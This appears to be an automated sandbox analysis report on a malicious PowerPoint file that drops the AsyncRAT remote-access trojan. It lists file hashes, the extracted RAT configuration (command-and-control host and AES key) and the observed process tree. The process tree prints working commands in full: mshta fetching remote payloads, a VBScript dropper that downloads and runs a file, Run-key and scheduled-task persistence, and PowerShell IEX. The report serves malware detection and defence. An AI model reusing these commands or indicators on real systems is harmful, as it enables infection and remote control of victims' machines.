Analysis
-
max time kernel
94s -
max time network
139s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
05-03-2021 10:01
Static task
static1
Behavioral task
behavioral1
Sample
sample.ppt
Resource
win7v20201028
Behavioral task
behavioral2
Sample
sample.ppt
Resource
win10v20201028
General
-
Target
sample.ppt
-
Size
224KB
-
MD5
f93b770274956fb4b09e4962a45c32da
-
SHA1
8e295f26e68ea595aaee521db9d29d39425ffbb1
-
SHA256
56dd6d0c5eacf5a7ec7233c4acb4cf97df95f66ed5d4d4880dca62f6b4b27a69
-
SHA512
98856b284df590ec1bf8e4edeab529315a3115a9f7d1a277328fa6ad4fcf25fa120b814a5714148df05386ff4d738523b3bec1617745631a766efab5cf95ced0
Malware Config
Extracted
asyncrat
0.5.7B
micomico.ddns.net:4000
AsyncMutex_6SI8OkPnk
-
aes_key
xHd6d9DzQMkRsJZC7bi0eTRsEMK6w0Yc
-
anti_detection
false
-
autorun
false
-
bdos
false
-
delay
2021comecou@$gringoooooobrabao
-
host
micomico.ddns.net
-
hwid
3
- install_file
-
install_folder
%AppData%
-
mutex
AsyncMutex_6SI8OkPnk
-
pastebin_config
null
-
port
4000
-
version
0.5.7B
Signatures
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
MSHTA.exeping.exeping.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process 2272 740 MSHTA.exe POWERPNT.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process 2164 740 ping.exe POWERPNT.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process 4100 740 ping.exe POWERPNT.EXE -
Async RAT payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/4760-85-0x0000000000400000-0x0000000000412000-memory.dmp asyncrat behavioral2/memory/4760-86-0x000000000040D0AE-mapping.dmp asyncrat -
Blocklisted process makes network request 15 IoCs
Processes:
MSHTA.exeWScript.exePowershell.exeflow pid process 32 2272 MSHTA.exe 34 2272 MSHTA.exe 36 2272 MSHTA.exe 38 2272 MSHTA.exe 40 2272 MSHTA.exe 48 2272 MSHTA.exe 49 2272 MSHTA.exe 50 2272 MSHTA.exe 53 2272 MSHTA.exe 54 2272 MSHTA.exe 56 2272 MSHTA.exe 57 2272 MSHTA.exe 59 1988 WScript.exe 61 1988 WScript.exe 68 1348 Powershell.exe -
Adds Run key to start application 2 TTPs 6 IoCs
Processes:
MSHTA.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\phulihoja = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell ((gp HKCU:\\Software).btfee)|IEX\"\", 0 : window.close\")" MSHTA.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run MSHTA.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\phulihoja = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell ((gp HKCU:\\Software).cutona)|IEX\"\", 0 : window.close\")" MSHTA.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\dkkkksakdosexography = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"mshta http://1230948%1230948@bublicamukajuka.blogspot.com/p/42.html\"\", 0 : window.close\")" MSHTA.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"mshta http://1230948%1230948@titupatiyannala-myrynaal.blogspot.com/p/42.html\"\", 0 : window.close\")" MSHTA.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\nunukhaoo = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"mshta http://1230948%1230948@papagunnakjllidmc.blogspot.com/p/42.html\"\", 0 : window.close\")" MSHTA.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 4196 2272 WerFault.exe MSHTA.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
winword.exePOWERPNT.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz winword.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString winword.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString POWERPNT.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 winword.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 6 IoCs
Processes:
winword.exePOWERPNT.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS winword.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily winword.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU winword.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU POWERPNT.EXE -
Kills process with taskkill 2 IoCs
Processes:
taskkill.exetaskkill.exepid process 3212 taskkill.exe 3524 taskkill.exe -
Modifies registry class 1 IoCs
Processes:
cmd.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings cmd.exe -
Runs ping.exe 1 TTPs 2 IoCs
-
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
POWERPNT.EXEwinword.exepid process 740 POWERPNT.EXE 3208 winword.exe -
Suspicious behavior: EnumeratesProcesses 22 IoCs
Processes:
WerFault.exePowershell.exePowershell.exepid process 4196 WerFault.exe 4196 WerFault.exe 4196 WerFault.exe 4196 WerFault.exe 4196 WerFault.exe 4196 WerFault.exe 4196 WerFault.exe 4196 WerFault.exe 4196 WerFault.exe 4196 WerFault.exe 4196 WerFault.exe 4196 WerFault.exe 4196 WerFault.exe 4196 WerFault.exe 4196 WerFault.exe 4196 WerFault.exe 2416 Powershell.exe 1348 Powershell.exe 2416 Powershell.exe 1348 Powershell.exe 2416 Powershell.exe 1348 Powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
taskkill.exetaskkill.exeWerFault.exePowershell.exePowershell.exedescription pid process Token: SeDebugPrivilege 3212 taskkill.exe Token: SeDebugPrivilege 3524 taskkill.exe Token: SeDebugPrivilege 4196 WerFault.exe Token: SeDebugPrivilege 1348 Powershell.exe Token: SeDebugPrivilege 2416 Powershell.exe Token: SeIncreaseQuotaPrivilege 2416 Powershell.exe Token: SeSecurityPrivilege 2416 Powershell.exe Token: SeTakeOwnershipPrivilege 2416 Powershell.exe Token: SeLoadDriverPrivilege 2416 Powershell.exe Token: SeSystemProfilePrivilege 2416 Powershell.exe Token: SeSystemtimePrivilege 2416 Powershell.exe Token: SeProfSingleProcessPrivilege 2416 Powershell.exe Token: SeIncBasePriorityPrivilege 2416 Powershell.exe Token: SeCreatePagefilePrivilege 2416 Powershell.exe Token: SeBackupPrivilege 2416 Powershell.exe Token: SeRestorePrivilege 2416 Powershell.exe Token: SeShutdownPrivilege 2416 Powershell.exe Token: SeDebugPrivilege 2416 Powershell.exe Token: SeSystemEnvironmentPrivilege 2416 Powershell.exe Token: SeRemoteShutdownPrivilege 2416 Powershell.exe Token: SeUndockPrivilege 2416 Powershell.exe Token: SeManageVolumePrivilege 2416 Powershell.exe Token: 33 2416 Powershell.exe Token: 34 2416 Powershell.exe Token: 35 2416 Powershell.exe Token: 36 2416 Powershell.exe Token: SeIncreaseQuotaPrivilege 1348 Powershell.exe Token: SeSecurityPrivilege 1348 Powershell.exe Token: SeTakeOwnershipPrivilege 1348 Powershell.exe Token: SeLoadDriverPrivilege 1348 Powershell.exe Token: SeSystemProfilePrivilege 1348 Powershell.exe Token: SeSystemtimePrivilege 1348 Powershell.exe Token: SeProfSingleProcessPrivilege 1348 Powershell.exe Token: SeIncBasePriorityPrivilege 1348 Powershell.exe Token: SeCreatePagefilePrivilege 1348 Powershell.exe Token: SeBackupPrivilege 1348 Powershell.exe Token: SeRestorePrivilege 1348 Powershell.exe Token: SeShutdownPrivilege 1348 Powershell.exe Token: SeDebugPrivilege 1348 Powershell.exe Token: SeSystemEnvironmentPrivilege 1348 Powershell.exe Token: SeRemoteShutdownPrivilege 1348 Powershell.exe Token: SeUndockPrivilege 1348 Powershell.exe Token: SeManageVolumePrivilege 1348 Powershell.exe Token: 33 1348 Powershell.exe Token: 34 1348 Powershell.exe Token: 35 1348 Powershell.exe Token: 36 1348 Powershell.exe Token: SeIncreaseQuotaPrivilege 2416 Powershell.exe Token: SeSecurityPrivilege 2416 Powershell.exe Token: SeTakeOwnershipPrivilege 2416 Powershell.exe Token: SeLoadDriverPrivilege 2416 Powershell.exe Token: SeSystemProfilePrivilege 2416 Powershell.exe Token: SeSystemtimePrivilege 2416 Powershell.exe Token: SeProfSingleProcessPrivilege 2416 Powershell.exe Token: SeIncBasePriorityPrivilege 2416 Powershell.exe Token: SeCreatePagefilePrivilege 2416 Powershell.exe Token: SeBackupPrivilege 2416 Powershell.exe Token: SeRestorePrivilege 2416 Powershell.exe Token: SeShutdownPrivilege 2416 Powershell.exe Token: SeDebugPrivilege 2416 Powershell.exe Token: SeSystemEnvironmentPrivilege 2416 Powershell.exe Token: SeRemoteShutdownPrivilege 2416 Powershell.exe Token: SeUndockPrivilege 2416 Powershell.exe Token: SeManageVolumePrivilege 2416 Powershell.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
Processes:
POWERPNT.EXEwinword.exepid process 740 POWERPNT.EXE 740 POWERPNT.EXE 740 POWERPNT.EXE 3208 winword.exe 3208 winword.exe 3208 winword.exe -
Suspicious use of WriteProcessMemory 24 IoCs
Processes:
POWERPNT.EXEMSHTA.execmd.exedescription pid process target process PID 740 wrote to memory of 2272 740 POWERPNT.EXE MSHTA.exe PID 740 wrote to memory of 2272 740 POWERPNT.EXE MSHTA.exe PID 740 wrote to memory of 2164 740 POWERPNT.EXE ping.exe PID 740 wrote to memory of 2164 740 POWERPNT.EXE ping.exe PID 740 wrote to memory of 3208 740 POWERPNT.EXE winword.exe PID 740 wrote to memory of 3208 740 POWERPNT.EXE winword.exe PID 2272 wrote to memory of 3172 2272 MSHTA.exe cmd.exe PID 2272 wrote to memory of 3172 2272 MSHTA.exe cmd.exe PID 2272 wrote to memory of 768 2272 MSHTA.exe schtasks.exe PID 2272 wrote to memory of 768 2272 MSHTA.exe schtasks.exe PID 2272 wrote to memory of 1348 2272 MSHTA.exe Powershell.exe PID 2272 wrote to memory of 1348 2272 MSHTA.exe Powershell.exe PID 2272 wrote to memory of 1348 2272 MSHTA.exe Powershell.exe PID 3172 wrote to memory of 1988 3172 cmd.exe WScript.exe PID 3172 wrote to memory of 1988 3172 cmd.exe WScript.exe PID 2272 wrote to memory of 2416 2272 MSHTA.exe Powershell.exe PID 2272 wrote to memory of 2416 2272 MSHTA.exe Powershell.exe PID 2272 wrote to memory of 2416 2272 MSHTA.exe Powershell.exe PID 2272 wrote to memory of 3524 2272 MSHTA.exe taskkill.exe PID 2272 wrote to memory of 3524 2272 MSHTA.exe taskkill.exe PID 2272 wrote to memory of 3212 2272 MSHTA.exe taskkill.exe PID 2272 wrote to memory of 3212 2272 MSHTA.exe taskkill.exe PID 740 wrote to memory of 4100 740 POWERPNT.EXE ping.exe PID 740 wrote to memory of 4100 740 POWERPNT.EXE ping.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\sample.ppt" /ou ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\MSHTA.exeMSHTA http://12384928198391823%12384928198391823@j.mp/dokdwkkwkdwkxxxdcjcdkwk2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c cd C:\Users\Public &@echo dim http_obj >>SiggiaW.vbs &@echo dim stream_obj >>SiggiaW.vbs &@echo dim shell_obj >>SiggiaW.vbs &@echo set http_obj = CreateObject("Microsoft.XMLHTTP") >>SiggiaW.vbs &@echo set stream_obj = CreateObject("ADODB.Stream") >>SiggiaW.vbs &@echo set shell_obj = CreateObject("WScript.Shell") >>SiggiaW.vbs &@echo URL = "https://ia801408.us.archive.org/25/items/defender_202103/defender.txt" >>SiggiaW.vbs &@echo http_obj.open "GET", URL, False >>SiggiaW.vbs &@echo http_obj.send >>SiggiaW.vbs &@echo stream_obj.type = 1 >>SiggiaW.vbs &@echo stream_obj.open >>SiggiaW.vbs &@echo stream_obj.write http_obj.responseBody >>SiggiaW.vbs &@echo stream_obj.savetofile "C:\Users\Public\1.txt", 2 >>SiggiaW.vbs &@echo Dim xxx >>SiggiaW.vbs &@echo Set xxx = CreateObject("Scripting.FileSystemObject") >>SiggiaW.vbs &@echo Set file = xxx.OpenTextFile("C:\Users\Public\FIX.VBS", 1) >>SiggiaW.vbs &@echo content = file.ReadAll >>SiggiaW.vbs &@echo content = StrReverse(content) >>SiggiaW.vbs &@echo Dim fso >>SiggiaW.vbs &@echo Dim fdsafdsa >>SiggiaW.vbs &@echo Dim oNode, fdsaa >>SiggiaW.vbs &@echo Const adTypeBinary = 1 >>SiggiaW.vbs &@echo Const adSaveCreateOverWrite = 2 >>SiggiaW.vbs &@echo Set oNode = CreateObject("Msxml2.DOMDocument.3.0").CreateElement("base64") >>SiggiaW.vbs &@echo oNode.dataType = "bin.base64" >>SiggiaW.vbs &@echo oNode.Text = content >>SiggiaW.vbs &@echo Set fdsaa = CreateObject("ADODB.Stream") >>SiggiaW.vbs &@echo fdsaa.Type = adTypeBinary >>SiggiaW.vbs &@echo tempdir = CreateObject("WScript.Shell").ExpandEnvironmentStrings("C:\Users\Public\bin.vbs") >>SiggiaW.vbs &@echo LocalFile = tempdir >>SiggiaW.vbs &@echo fdsaa.Open >>SiggiaW.vbs &@echo fdsaa.Write oNode.nodeTypedValue >>SiggiaW.vbs &@echo fdsaa.SaveToFile LocalFile, adSaveCreateOverWrite >>SiggiaW.vbs &@echo Set fso = CreateObject("Scripting.FileSystemObject") >>SiggiaW.vbs &@echo Set fdsafdsa = CreateObject("WScript.Shell") >>SiggiaW.vbs &@echo If (fso.FileExists(LocalFile)) Then >>SiggiaW.vbs &@echo fdsafdsa.RUN (LocalFile) >>SiggiaW.vbs &@echo End If>>SiggiaW.vbs& SiggiaW.vbs &dEl SiggiaW.vbs3⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Public\SiggiaW.vbs"4⤵
- Blocklisted process makes network request
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""tutipajikhana"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta http://1230948%1230948@mylundisfarbigthenyouthink.blogspot.com/p/42.html""\"", 0 : window.close"\")3⤵
- Creates scheduled task(s)
-
C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe"C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe" -noexit ((gp HKCU:\Software).cutona)|IEX3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe"4⤵
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 6925⤵
-
C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe"C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe" -noexit ((gp HKCU:\Software).btfee)|IEX3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im winword.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im Excel.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2272 -s 28163⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\ping.exeping2⤵
- Process spawned unexpected child process
- Runs ping.exe
-
C:\Program Files\Microsoft Office\Root\Office16\winword.exewinword2⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SYSTEM32\ping.exeping 127.0.0.12⤵
- Process spawned unexpected child process
- Runs ping.exe
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheMD5
7b619bb67bea8c3e777e6255af672811
SHA173a0ddab06af144e4b1ce7aa1857c06dec5d8740
SHA2560f7aebca0b8db44ed97560dd716cf88d0d6e3bf7c4561f98354960acd1e1b404
SHA51235e7190ffe8f81042e8588052990ecd28470a438196c3c5e813737af35a7e2a349e82a403680864ebca7527bc5643d95335a3cb612a8c81ad6158d00e0c3293b
-
C:\Users\Public\SiggiaW.vbsMD5
49744d1b597f85a2691eeeccab3f5ec9
SHA153be659955bdf552d103ddd2251f97920c4830bd
SHA25609af8affea2e91779fc5bd8e45c8eb4274f6cb0fe78cb96c77586f988958fb6f
SHA5127d6036c802670bca691b26e3f22badfce85641354d67d460d38ff26edef248bcc6a51bf81406b11f2b6972525f8af6dfdcc26f298438280d001b03292f767e3f
-
memory/740-2-0x00007FFD4E120000-0x00007FFD4E130000-memory.dmpFilesize
64KB
-
memory/740-5-0x00007FFD4E120000-0x00007FFD4E130000-memory.dmpFilesize
64KB
-
memory/740-6-0x00007FFD6FAE0000-0x00007FFD70117000-memory.dmpFilesize
6.2MB
-
memory/740-4-0x00007FFD4E120000-0x00007FFD4E130000-memory.dmpFilesize
64KB
-
memory/740-3-0x00007FFD4E120000-0x00007FFD4E130000-memory.dmpFilesize
64KB
-
memory/740-39-0x00007FFD4E120000-0x00007FFD4E130000-memory.dmpFilesize
64KB
-
memory/740-38-0x00007FFD4E120000-0x00007FFD4E130000-memory.dmpFilesize
64KB
-
memory/740-37-0x00007FFD4E120000-0x00007FFD4E130000-memory.dmpFilesize
64KB
-
memory/740-36-0x00007FFD4E120000-0x00007FFD4E130000-memory.dmpFilesize
64KB
-
memory/740-27-0x00007FFD70A50000-0x00007FFD7262D000-memory.dmpFilesize
27.9MB
-
memory/768-16-0x0000000000000000-mapping.dmp
-
memory/1348-77-0x000000000ABE0000-0x000000000ABE1000-memory.dmpFilesize
4KB
-
memory/1348-64-0x000000000B840000-0x000000000B841000-memory.dmpFilesize
4KB
-
memory/1348-46-0x0000000008420000-0x0000000008421000-memory.dmpFilesize
4KB
-
memory/1348-44-0x00000000083B0000-0x00000000083B1000-memory.dmpFilesize
4KB
-
memory/1348-84-0x000000000ABE0000-0x000000000ABE3000-memory.dmpFilesize
12KB
-
memory/1348-82-0x000000000ACB0000-0x000000000ACB1000-memory.dmpFilesize
4KB
-
memory/1348-26-0x0000000073F60000-0x000000007464E000-memory.dmpFilesize
6.9MB
-
memory/1348-80-0x000000000B270000-0x000000000B271000-memory.dmpFilesize
4KB
-
memory/1348-79-0x000000007FAB0000-0x000000007FAB1000-memory.dmpFilesize
4KB
-
memory/1348-78-0x000000000B1C0000-0x000000000B1C1000-memory.dmpFilesize
4KB
-
memory/1348-33-0x0000000004EC0000-0x0000000004EC1000-memory.dmpFilesize
4KB
-
memory/1348-56-0x000000000A720000-0x000000000A721000-memory.dmpFilesize
4KB
-
memory/1348-69-0x000000000AC20000-0x000000000AC53000-memory.dmpFilesize
204KB
-
memory/1348-35-0x0000000004EC2000-0x0000000004EC3000-memory.dmpFilesize
4KB
-
memory/1348-67-0x0000000004EC3000-0x0000000004EC4000-memory.dmpFilesize
4KB
-
memory/1348-17-0x0000000000000000-mapping.dmp
-
memory/1348-52-0x0000000008D90000-0x0000000008D91000-memory.dmpFilesize
4KB
-
memory/1348-60-0x000000000A680000-0x000000000A681000-memory.dmpFilesize
4KB
-
memory/1348-58-0x000000000A420000-0x000000000A421000-memory.dmpFilesize
4KB
-
memory/1348-40-0x0000000007920000-0x0000000007921000-memory.dmpFilesize
4KB
-
memory/1988-21-0x0000000000000000-mapping.dmp
-
memory/2164-8-0x0000000000000000-mapping.dmp
-
memory/2272-7-0x0000000000000000-mapping.dmp
-
memory/2416-34-0x00000000066D2000-0x00000000066D3000-memory.dmpFilesize
4KB
-
memory/2416-30-0x0000000006D10000-0x0000000006D11000-memory.dmpFilesize
4KB
-
memory/2416-48-0x0000000007370000-0x0000000007371000-memory.dmpFilesize
4KB
-
memory/2416-54-0x0000000008B60000-0x0000000008B61000-memory.dmpFilesize
4KB
-
memory/2416-42-0x00000000073B0000-0x00000000073B1000-memory.dmpFilesize
4KB
-
memory/2416-25-0x0000000073F60000-0x000000007464E000-memory.dmpFilesize
6.9MB
-
memory/2416-28-0x0000000004570000-0x0000000004571000-memory.dmpFilesize
4KB
-
memory/2416-62-0x0000000009EE0000-0x0000000009EE1000-memory.dmpFilesize
4KB
-
memory/2416-50-0x0000000007DA0000-0x0000000007DA1000-memory.dmpFilesize
4KB
-
memory/2416-66-0x0000000009D80000-0x0000000009D81000-memory.dmpFilesize
4KB
-
memory/2416-18-0x0000000000000000-mapping.dmp
-
memory/2416-32-0x00000000066D0000-0x00000000066D1000-memory.dmpFilesize
4KB
-
memory/3172-15-0x0000000000000000-mapping.dmp
-
memory/3208-14-0x00007FFD6FAE0000-0x00007FFD70117000-memory.dmpFilesize
6.2MB
-
memory/3208-9-0x0000000000000000-mapping.dmp
-
memory/3212-20-0x0000000000000000-mapping.dmp
-
memory/3524-19-0x0000000000000000-mapping.dmp
-
memory/4100-23-0x0000000000000000-mapping.dmp
-
memory/4196-24-0x000001B9AD2F0000-0x000001B9AD2F1000-memory.dmpFilesize
4KB
-
memory/4760-85-0x0000000000400000-0x0000000000412000-memory.dmpFilesize
72KB
-
memory/4760-86-0x000000000040D0AE-mapping.dmp
-
memory/4760-88-0x00000000027D0000-0x00000000027D1000-memory.dmpFilesize
4KB
-
memory/4796-87-0x0000000000000000-mapping.dmp
-
memory/4796-90-0x0000000002970000-0x0000000002971000-memory.dmpFilesize
4KB
-
memory/4796-91-0x0000000002970000-0x0000000002971000-memory.dmpFilesize
4KB
-
memory/4796-92-0x0000000002970000-0x0000000002971000-memory.dmpFilesize
4KB
-
memory/4796-94-0x0000000002970000-0x0000000002971000-memory.dmpFilesize
4KB
-
memory/4796-89-0x00000000024D0000-0x00000000024D1000-memory.dmpFilesize
4KB